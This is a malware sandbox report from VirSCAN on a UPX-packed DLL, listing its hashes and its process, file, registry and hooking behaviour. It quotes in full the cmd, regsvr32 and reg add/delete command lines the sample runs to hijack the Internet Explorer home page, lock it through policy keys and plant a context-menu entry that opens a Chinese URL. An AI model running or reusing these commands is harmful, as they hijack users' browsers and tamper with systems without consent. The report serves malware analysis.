VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Language
Server load
Server Load

File information
Safety rating:21
Behavior list
Basic Information
MD5:efd7a3d47e6e9df9141c098e0eaeab74
file type:DLL
Production company:
version:1.0.0.0---1.0.0.0
Shell or compiler information:PACKER:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
Subfile information:upx_c_20513af2dumpFile / a4b411603516794b05cd9a277857544c / DLL
Key behavior
Behavior description:写权限映射文件
details:CiceroSharedMemDefaultS-*
Behavior description:DLL样本(x86)
details:N/A
Behavior description:修改注册表_IE首页
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description:修改注册表_禁用修改IE首页属性
details:\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\control Panel\HomePage
Process behavior
Behavior description:隐藏窗口创建进程
details:ImagePath = , CmdLine = cmd /c regsvr32 /u /s igfxpph.dll & reg delete hkey_classes_root\directory\background\shellex\contextmenuhandlers /f & reg add hkey_classes_root\directory\background\shellex\contextmenuhandlers\new /ve /d {d969a300-e7ff-11d0-a93b-00a0c9
Behavior description:创建进程
details:ImagePath = C:\WINDOWS\system32\CMD.exe, CmdLine = CMD /C regsvr32 /u /s igfxpph.dll & reg delete HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers /f & reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\new /ve /d {D96
ImagePath = C:\WINDOWS\system32\regsvr32.exe, CmdLine = regsvr32 /u /s igfxpph.dll
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg delete HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\new /ve /d {D969A300-E7FF-11d0-A93B-00A0C90F2719}
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32 /ve /t reg_expand_sz /d C:\WINDOWS\system32\shdocvw.dll /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance /v CLSID /t reg_sz /d {3f454f0e-42ae-4d7c-8ea3-328250d6e272} /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v Param1 /t reg_sz /d http://www.234la.com /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v command /t reg_sz /d 360安全浏览器上网 /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v method /t reg_sz /d ShellExecute /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag /v CLSID /t reg_sz /d {13709620-C279-11CE-A49E-444553540000} /f
ImagePath = C:\WINDOWS\system32\reg.exe, CmdLine = reg add HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\{00000000-0000-0000-0000-000000000001}
Behavior description:枚举进程
details:N/A
File behavior
Behavior description:写权限映射文件
details:CiceroSharedMemDefaultS-*
Behavior description:查找文件
details:FileName = C:\Documents and Settings\Administrator\桌面\*.*
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\CMD.exe
FileName = C:\WINDOWS\system32\cmd.exe
FileName = C:\WINDOWS\system32\regsvr32.*
FileName = C:\WINDOWS\system32\regsvr32.COM
FileName = C:\WINDOWS\system32\regsvr32.EXE
FileName = C:\WINDOWS\system32\regsvr32.exe
FileName = C:\WINDOWS\system32\reg.*
FileName = C:\WINDOWS\system32\reg.COM
FileName = C:\WINDOWS\system32\reg.EXE
FileName = C:\WINDOWS\system32\reg.exe
Registry behavior
Behavior description:修改注册表_系统右键菜单
details:\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\new\
Behavior description:修改注册表_组策略
details:\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Start Page
\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Search Bar
\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Search Page
\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\Main\Default_Page_URL
Behavior description:修改注册表_IE关键属性
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
Behavior description:修改注册表_禁用修改IE首页属性
details:\REGISTRY\USER\S-*\Software\Policies\Microsoft\Internet Explorer\control Panel\HomePage
Behavior description:修改注册表
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main\Start Page
\REGISTRY\USER\S-*\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
\REGISTRY\MACHINE\SYSTEM\ControlSet002\Hardware Profiles\0001\Software\Policies\Microsoft\Internet Explorer\Control Panel\Homepage
\REGISTRY\USER\S-*\Software\Microsoft\Multimedia\DrawDib\vga.drv 1920x973x16(565 0)
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\CLSID
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\Param1
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\command
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\method
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\Instance\InitPropertyBag\CLSID
Behavior description:删除注册表键_系统右键菜单
details:\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers\New
\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shellex\ContextMenuHandlers
Behavior description:修改注册表_IE首页
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Other behavior
Behavior description:创建互斥体
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
SHIMLIB_LOG_MUTEX
Behavior description:内联HOOK
details:C:\WINDOWS\system32\GDI32.dll--->ExtTextOutA Offset = 0x0
C:\WINDOWS\system32\GDI32.dll--->ExtTextOutW Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetWindowLongA Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->SetWindowLongA Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->SetWindowLongW Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetWindowLongW Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->BeginPaint Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->EndPaint Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetWindowDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->ReleaseDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->WindowFromDC Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetScrollInfo Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetScrollPos Offset = 0x0
C:\WINDOWS\system32\USER32.dll--->GetScrollRange Offset = 0x0
Behavior description:DLL样本(x86)
details:N/A
Behavior description:获取系统权限
details:SE_LOAD_DRIVER_PRIVILEGE
SE_DEBUG_PRIVILEGE
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
中国反网络病毒联盟
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号